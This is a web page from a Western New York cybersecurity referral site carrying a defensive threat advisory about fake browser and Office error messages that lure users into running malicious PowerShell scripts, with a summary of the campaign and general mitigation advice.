icon

Digital safety starts here for both commercial and personal Use...

Defend Your Business Against the Latest WNY Cyber Threats We offer Safe, Secure and Affordable Solutions for your Business and Personal Networks and Devices.



WNYCyber is there to help you to choose the best service providers in Western New York... We DO NOT provide the services ourselves, as we are Internet Programmers who have to deak daily with Cyber Threats... (Ugghhh)... So we know what it's like and what it takes to protect OUR and OUR CUSTOMERS DATA... We built this Website to help steer you to those that can give you the best service at realistic and non-inflated prices. We do charge or collect any fees.

Buffalo, New York
United States

Current Threat Data

Fake Google Chrome Errors Trick You into Running Malicious PowerShell Scripts

Summary:
A sophisticated malware distribution campaign has emerged, utilizing fake error messages resembling Google Chrome, Microsoft Word, and OneDrive issues to deceive users into running malicious PowerShell scripts. This campaign involves several threat actors, including ClearFake, ClickFix, and TA571, known for their previous involvement in spam distribution and malware dissemination.

The attackers leverage compromised websites and HTML attachments with JavaScript to display convincing error overlays. Users are prompted to execute a PowerShell "fix" by copying and pasting commands, ostensibly to resolve the displayed errors. Once executed, these scripts lead to the installation of various malware strains such as DarkGate, Matanbuchus, NetSupport, Amadey Loader, XMRig, a clipboard hijacker, and Lumma Stealer. These payloads aim to steal information, perform crypto-mining, and facilitate further compromise of the infected systems.

Security Officer Comments:
The campaign relies on sophisticated social engineering tactics, presenting users with apparent technical issues and offering quick solutions through the PowerShell scripts. This approach exploits users' trust and urgency to fix perceived problems, bypassing their caution. Three main attack chains have been observed, each targeting different entry points including compromised websites, HTML email attachments posing as Microsoft Word documents, and direct overlays on webpages. This diversification increases the likelihood of successful infections across different user environments.

Suggested Corrections:
To mitigate these threats, organizations and individuals should take proactive steps. Immediate patching and updating software to the latest versions are crucial to closing known vulnerabilities. Security awareness training is essential to educate users about common phishing tactics, including fake error messages, and train them to recognize and report suspicious activities. Implementing robust endpoint protection, email filtering, and web security solutions can detect and block malicious scripts and payloads before they execute. Developing and testing incident response plans helps organizations quickly identify, contain, and mitigate the impact of malware infections.

Link(s):
https://www.bleepingcomputer.com/ne...ou-into-running-malicious-powershell-scripts/

Contact Us for Threat Assistance
Back to Current Threats